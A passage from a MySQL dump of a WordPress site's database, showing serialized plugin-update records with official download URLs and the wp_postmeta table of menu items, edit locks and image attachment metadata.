s/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/column-shortcodes.1.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/column-shortcodes/assets/icon-256x256.png?rev=1679769\";s:2:\"1x\";s:70:\"https://ps.w.org/column-shortcodes/assets/icon-128x128.png?rev=1679769\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/column-shortcodes/assets/banner-772x250.png?rev=580886\";}s:11:\"banners_rtl\";a:0:{}}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:3:\"5.4\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/contact-form-7.5.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}}s:59:\"content-views-query-and-display-post-page/content-views.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:55:\"w.org/plugins/content-views-query-and-display-post-page\";s:4:\"slug\";s:41:\"content-views-query-and-display-post-page\";s:6:\"plugin\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:11:\"new_version\";s:7:\"2.4.0.1\";s:3:\"url\";s:72:\"https://wordpress.org/plugins/content-views-query-and-display-post-page/\";s:7:\"package\";s:92:\"https://downloads.wordpress.org/plugin/content-views-query-and-display-post-page.2.4.0.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:94:\"https://ps.w.org/content-views-query-and-display-post-page/assets/icon-128x128.png?rev=1696016\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:96:\"https://ps.w.org/content-views-query-and-display-post-page/assets/banner-772x250.png?rev=1696016\";}s:11:\"banners_rtl\";a:0:{}}s:55:\"iubenda-cookie-law-solution/iubenda_cookie_solution.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:41:\"w.org/plugins/iubenda-cookie-law-solution\";s:4:\"slug\";s:27:\"iubenda-cookie-law-solution\";s:6:\"plugin\";s:55:\"iubenda-cookie-law-solution/iubenda_cookie_solution.php\";s:11:\"new_version\";s:5:\"2.5.0\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/iubenda-cookie-law-solution/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/iubenda-cookie-law-solution.2.5.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/iubenda-cookie-law-solution/assets/icon-256x256.jpg?rev=2017712\";s:2:\"1x\";s:80:\"https://ps.w.org/iubenda-cookie-law-solution/assets/icon-128x128.jpg?rev=2017712\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/iubenda-cookie-law-solution/assets/banner-1544x500.jpg?rev=2245715\";s:2:\"1x\";s:82:\"https://ps.w.org/iubenda-cookie-law-solution/assets/banner-772x250.jpg?rev=2245715\";}s:11:\"banners_rtl\";a:0:{}}s:59:\"woocommerce-direct-checkout/woocommerce-direct-checkout.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:41:\"w.org/plugins/woocommerce-direct-checkout\";s:4:\"slug\";s:27:\"woocommerce-direct-checkout\";s:6:\"plugin\";s:59:\"woocommerce-direct-checkout/woocommerce-direct-checkout.php\";s:11:\"new_version\";s:5:\"2.4.5\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/woocommerce-direct-checkout/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/woocommerce-direct-checkout.2.4.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/woocommerce-direct-checkout/assets/icon-256x256.jpg?rev=2357348\";s:2:\"1x\";s:80:\"https://ps.w.org/woocommerce-direct-checkout/assets/icon-128x128.jpg?rev=2357348\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/woocommerce-direct-checkout/assets/banner-1544x500.jpg?rev=2334961\";s:2:\"1x\";s:82:\"https://ps.w.org/woocommerce-direct-checkout/assets/banner-772x250.jpg?rev=2334961\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"lightbox-gallery/lightbox-gallery.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/lightbox-gallery\";s:4:\"slug\";s:16:\"lightbox-gallery\";s:6:\"plugin\";s:37:\"lightbox-gallery/lightbox-gallery.php\";s:11:\"new_version\";s:5:\"0.9.2\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/lightbox-gallery/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/lightbox-gallery.0.9.2.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:67:\"https://s.w.org/plugins/geopattern-icon/lightbox-gallery_4a535d.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/lightbox-gallery/assets/banner-772x250.jpg?rev=478738\";}s:11:\"banners_rtl\";a:0:{}}s:29:\"wp-mail-bank/wp-mail-bank.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:26:\"w.org/plugins/wp-mail-bank\";s:4:\"slug\";s:12:\"wp-mail-bank\";s:6:\"plugin\";s:29:\"wp-mail-bank/wp-mail-bank.php\";s:11:\"new_version\";s:6:\"4.0.13\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wp-mail-bank/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/wp-mail-bank.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wp-mail-bank/assets/icon-256x256.png?rev=1966190\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-mail-bank/assets/icon-128x128.png?rev=1966190\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wp-mail-bank/assets/banner-1544x500.png?rev=1966190\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-mail-bank/assets/banner-772x250.png?rev=1966191\";}s:11:\"banners_rtl\";a:0:{}}s:36:\"mailjet-for-wordpress/wp-mailjet.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:35:\"w.org/plugins/mailjet-for-wordpress\";s:4:\"slug\";s:21:\"mailjet-for-wordpress\";s:6:\"plugin\";s:36:\"mailjet-for-wordpress/wp-mailjet.php\";s:11:\"new_version\";s:5:\"5.2.6\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/mailjet-for-wordpress/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/mailjet-for-wordpress.5.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/mailjet-for-wordpress/assets/icon-256x256.png?rev=2509612\";s:2:\"1x\";s:74:\"https://ps.w.org/mailjet-for-wordpress/assets/icon-128x128.png?rev=2509612\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/mailjet-for-wordpress/assets/banner-1544x500.jpg?rev=2509656\";s:2:\"1x\";s:76:\"https://ps.w.org/mailjet-for-wordpress/assets/banner-772x250.jpg?rev=2509656\";}s:11:\"banners_rtl\";a:0:{}}s:21:\"mailin/sendinblue.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:20:\"w.org/plugins/mailin\";s:4:\"slug\";s:6:\"mailin\";s:6:\"plugin\";s:21:\"mailin/sendinblue.php\";s:11:\"new_version\";s:5:\"3.1.9\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/mailin/\";s:7:\"package\";s:49:\"https://downloads.wordpress.org/plugin/mailin.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/mailin/assets/icon-256x256.png?rev=2128831\";s:2:\"1x\";s:59:\"https://ps.w.org/mailin/assets/icon-128x128.png?rev=2128831\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/mailin/assets/banner-772x250.jpg?rev=2128832\";}s:11:\"banners_rtl\";a:0:{}}s:23:\"page-list/page-list.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:23:\"w.org/plugins/page-list\";s:4:\"slug\";s:9:\"page-list\";s:6:\"plugin\";s:23:\"page-list/page-list.php\";s:11:\"new_version\";s:3:\"5.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/page-list/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/page-list.5.2.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:60:\"https://s.w.org/plugins/geopattern-icon/page-list_ffffff.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/page-list/assets/banner-772x250.png?rev=616293\";}s:11:\"banners_rtl\";a:0:{}}s:31:\"popup-builder/popup-builder.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:27:\"w.org/plugins/popup-builder\";s:4:\"slug\";s:13:\"popup-builder\";s:6:\"plugin\";s:31:\"popup-builder/popup-builder.php\";s:11:\"new_version\";s:4:\"3.83\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/popup-builder/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/popup-builder.3.83.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/popup-builder/assets/icon-128x128.gif?rev=2289412\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/popup-builder/assets/banner-772x250.jpg?rev=1908745\";}s:11:\"banners_rtl\";a:0:{}}s:26:\"post-smtp/postman-smtp.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:23:\"w.org/plugins/post-smtp\";s:4:\"slug\";s:9:\"post-smtp\";s:6:\"plugin\";s:26:\"post-smtp/postman-smtp.php\";s:11:\"new_version\";s:6:\"2.0.22\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/post-smtp/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/post-smtp.2.0.22.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:62:\"https://ps.w.org/post-smtp/assets/icon-128x128.gif?rev=2474996\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:64:\"https://ps.w.org/post-smtp/assets/banner-772x250.png?rev=2088289\";}s:11:\"banners_rtl\";a:0:{}}s:47:\"really-simple-captcha/really-simple-captcha.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:35:\"w.org/plugins/really-simple-captcha\";s:4:\"slug\";s:21:\"really-simple-captcha\";s:6:\"plugin\";s:47:\"really-simple-captcha/really-simple-captcha.php\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/really-simple-captcha/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/really-simple-captcha.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/really-simple-captcha/assets/icon-256x256.png?rev=1047241\";s:2:\"1x\";s:74:\"https://ps.w.org/really-simple-captcha/assets/icon-128x128.png?rev=1047241\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/really-simple-captcha/assets/banner-1544x500.png?rev=880406\";s:2:\"1x\";s:75:\"https://ps.w.org/really-simple-captcha/assets/banner-772x250.png?rev=880406\";}s:11:\"banners_rtl\";a:0:{}}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:31:\"w.org/plugins/really-simple-ssl\";s:4:\"slug\";s:17:\"really-simple-ssl\";s:6:\"plugin\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:11:\"new_version\";s:6:\"4.0.14\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/really-simple-ssl/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/really-simple-ssl.4.0.14.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-128x128.png?rev=1782452\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/really-simple-ssl/assets/banner-1544x500.png?rev=2320223\";s:2:\"1x\";s:72:\"https://ps.w.org/really-simple-ssl/assets/banner-772x250.png?rev=2320228\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"instagram-feed/instagram-feed.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/instagram-feed\";s:4:\"slug\";s:14:\"instagram-feed\";s:6:\"plugin\";s:33:\"instagram-feed/instagram-feed.php\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/instagram-feed/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/instagram-feed.2.9.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/instagram-feed/assets/icon-128x128.png?rev=2137676\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/instagram-feed/assets/banner-772x250.png?rev=2137676\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"sydney-toolbox/sydney-toolbox.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/sydney-toolbox\";s:4:\"slug\";s:14:\"sydney-toolbox\";s:6:\"plugin\";s:33:\"sydney-toolbox/sydney-toolbox.php\";s:11:\"new_version\";s:4:\"1.15\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/sydney-toolbox/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/sydney-toolbox.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:58:\"https://s.w.org/plugins/geopattern-icon/sydney-toolbox.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:7:\"1.16.53\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/updraftplus.1.16.53.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}}s:91:\"woocommerce-gateway-paypal-express-checkout/woocommerce-gateway-paypal-express-checkout.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:57:\"w.org/plugins/woocommerce-gateway-paypal-express-checkout\";s:4:\"slug\";s:43:\"woocommerce-gateway-paypal-express-checkout\";s:6:\"plugin\";s:91:\"woocommerce-gateway-paypal-express-checkout/woocommerce-gateway-paypal-express-checkout.php\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:74:\"https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/\";s:7:\"package\";s:92:\"https://downloads.wordpress.org/plugin/woocommerce-gateway-paypal-express-checkout.2.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:96:\"https://ps.w.org/woocommerce-gateway-paypal-express-checkout/assets/icon-256x256.png?rev=2423949\";s:2:\"1x\";s:96:\"https://ps.w.org/woocommerce-gateway-paypal-express-checkout/assets/icon-128x128.png?rev=2423949\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:99:\"https://ps.w.org/woocommerce-gateway-paypal-express-checkout/assets/banner-1544x500.png?rev=2423949\";s:2:\"1x\";s:98:\"https://ps.w.org/woocommerce-gateway-paypal-express-checkout/assets/banner-772x250.png?rev=2423949\";}s:11:\"banners_rtl\";a:0:{}}s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:37:\"w.org/plugins/woo-stickers-by-webline\";s:4:\"slug\";s:23:\"woo-stickers-by-webline\";s:6:\"plugin\";s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";s:11:\"new_version\";s:5:\"1.1.5\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/woo-stickers-by-webline/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/woo-stickers-by-webline.1.1.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/woo-stickers-by-webline/assets/icon-128x128.jpg?rev=1032941\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:78:\"https://ps.w.org/woo-stickers-by-webline/assets/banner-772x250.jpg?rev=1032941\";}s:11:\"banners_rtl\";a:0:{}}s:31:\"wp-serverinfo/wp-serverinfo.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:27:\"w.org/plugins/wp-serverinfo\";s:4:\"slug\";s:13:\"wp-serverinfo\";s:6:\"plugin\";s:31:\"wp-serverinfo/wp-serverinfo.php\";s:11:\"new_version\";s:4:\"1.66\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wp-serverinfo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wp-serverinfo.1.66.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/wp-serverinfo/assets/icon.svg?rev=978065\";s:3:\"svg\";s:57:\"https://ps.w.org/wp-serverinfo/assets/icon.svg?rev=978065\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wp-serverinfo/assets/banner-1544x500.jpg?rev=1206766\";s:2:\"1x\";s:68:\"https://ps.w.org/wp-serverinfo/assets/banner-772x250.jpg?rev=1206766\";}s:11:\"banners_rtl\";a:0:{}}s:35:\"wp-fastest-cache/wpFastestCache.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/wp-fastest-cache\";s:4:\"slug\";s:16:\"wp-fastest-cache\";s:6:\"plugin\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:11:\"new_version\";s:7:\"0.9.1.7\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/wp-fastest-cache/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/wp-fastest-cache.0.9.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-256x256.png?rev=2064586\";s:2:\"1x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-128x128.png?rev=1068904\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/wp-fastest-cache/assets/banner-772x250.jpg?rev=1064099\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"options-importer/options-importer.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/options-importer\";s:4:\"slug\";s:16:\"options-importer\";s:6:\"plugin\";s:37:\"options-importer/options-importer.php\";s:11:\"new_version\";s:1:\"5\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/options-importer/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/options-importer.5.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:60:\"https://s.w.org/plugins/geopattern-icon/options-importer.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:6:\"16.1.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wordpress-seo.16.1.1.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2363699\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1843435\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1843435\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1843435\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1843435\";}}}}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=58987 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (4,6,'_wp_attached_file','2015/07/le-5-portate-dello-chef-2-15-06-15.docx'),(5,5,'_edit_last','2'),(6,5,'_edit_lock','1549977756:2'),(7,10,'_edit_last','1'),(8,10,'_wp_page_template','default'),(9,10,'_edit_lock','1595325524:2'),(10,14,'_edit_last','2'),(11,14,'_edit_lock','1549976994:2'),(12,14,'_wp_page_template','default'),(22,17,'_menu_item_type','post_type'),(23,17,'_menu_item_menu_item_parent','0'),(24,17,'_menu_item_object_id','10'),(25,17,'_menu_item_object','page'),(26,17,'_menu_item_target',''),(27,17,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28,17,'_menu_item_xfn',''),(29,17,'_menu_item_url',''),(31,18,'_menu_item_type','post_type'),(32,18,'_menu_item_menu_item_parent','17'),(33,18,'_menu_item_object_id','5'),(34,18,'_menu_item_object','page'),(35,18,'_menu_item_target',''),(36,18,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37,18,'_menu_item_xfn',''),(38,18,'_menu_item_url',''),(40,19,'_menu_item_type','post_type'),(41,19,'_menu_item_menu_item_parent','17'),(42,19,'_menu_item_object_id','14'),(43,19,'_menu_item_object','page'),(44,19,'_menu_item_target',''),(45,19,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(46,19,'_menu_item_xfn',''),(47,19,'_menu_item_url',''),(52,22,'_edit_last','2'),(53,22,'_edit_lock','1601147891:2'),(54,22,'_wp_page_template','default'),(55,28,'_edit_last','1'),(56,28,'_edit_lock','1607252995:1'),(57,28,'_wp_page_template','default'),(37658,3698,'original_to','webmaster@baldisserri.com'),(67,36,'_edit_last','2'),(68,36,'_edit_lock','1608364081:1'),(69,36,'_wp_page_template','default'),(70,38,'_wp_attached_file','2015/07/logo2.png'),(71,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:70;s:6:\"height\";i:100;s:4:\"file\";s:17:\"2015/07/logo2.png\";s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:16:\"logo2-70x100.png\";s:5:\"width\";i:70;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(72,40,'_wp_attached_file','2015/07/foto_cucina.jpg'),(73,40,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:810;s:6:\"height\";i:810;s:4:\"file\";s:23:\"2015/07/foto_cucina.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"foto_cucina-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"foto_cucina-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"foto_cucina-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"foto_cucina-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"foto_cucina-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"foto_cucina-672x372.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"impressive-full-width\";a:4:{s:4:\"file\";s:23:\"foto_cucina-810x576.jpg\";s:5:\"width\";i:810;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"impressive-home-blog-image\";a:4:{s:4:\"file\";s:23:\"foto_cucina-570x190.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(84,43,'_menu_item_type','post_type'),(85,43,'_menu_item_menu_item_parent','0'),(86,43,'_menu_item_object_id','28'),(87,43,'_menu_item_object','page'),(88,43,'_menu_item_target',''),(89,43,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(90,43,'_menu_item_xfn',''),(91,43,'_menu_item_url',''),(102,45,'_menu_item_type','post_type'),(103,45,'_menu_item_menu_item_parent','0'),(104,45,'_menu_item_object_id','22'),(105,45,'_menu_item_object','page'),(106,45,'_menu_item_target',''),(107,45,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(108,45,'_menu_item_xfn',''),(109,45,'_menu_item_url',''),(120,47,'_edit_last','2'),(121,47,'_edit_lock','1595422792:2'),(122,47,'_wp_page_template','default'),(123,49,'_edit_last','2'),(124,49,'_edit_lock','1549977480:2'),(125,49,'_wp_page_template','default'),(126,51,'_edit_last','2'),(127,51,'_edit_lock','1595423015:2'),(128,51,'_wp_page_template','default'),(129,54,'_edit_last','2'),(130,54,'_edit_lock','1595440609:2'),(131,54,'_wp_page_template','default'),(132,56,'_menu_item_type','post_type'),(133,56,'_menu_item_menu_item_parent','17'),(134,56,'_menu_item_object_id','54'),(135,56,'_menu_item_object','page'),(136,56,'_menu_item_target',''),(137,56,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(138,56,'_menu_item_xfn',''),(139,56,'_menu_item_url',''),(141,57,'_menu_item_type','post_type'),(142,57,'_menu_item_menu_item_parent','17'),(143,57,'_menu_item_object_id','51'),(144,57,'_menu_item_object','page'),(145,57,'_menu_item_target',''),(146,57,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(147,57,'_menu_item_xfn',''),(148,57,'_menu_item_url',''),(150,58,'_menu_item_type','post_type'),(151,58,'_menu_item_menu_item_parent','17'),(152,58,'_menu_item_object_id','49'),(153,58,'_menu_item_object','page'),(154,58,'_menu_item_target',''),(155,58,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(156,58,'_menu_item_xfn',''),(157,58,'_menu_item_url',''),(159,59,'_menu_item_type','post_type'),(160,59,'_menu_item_menu_item_parent','17'),(161,59,'_menu_item_object_id','47'),(162,59,'_menu_item_object','page'),(163,59,'_menu_item_target',''),(164,59,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(165,59,'_menu_item_x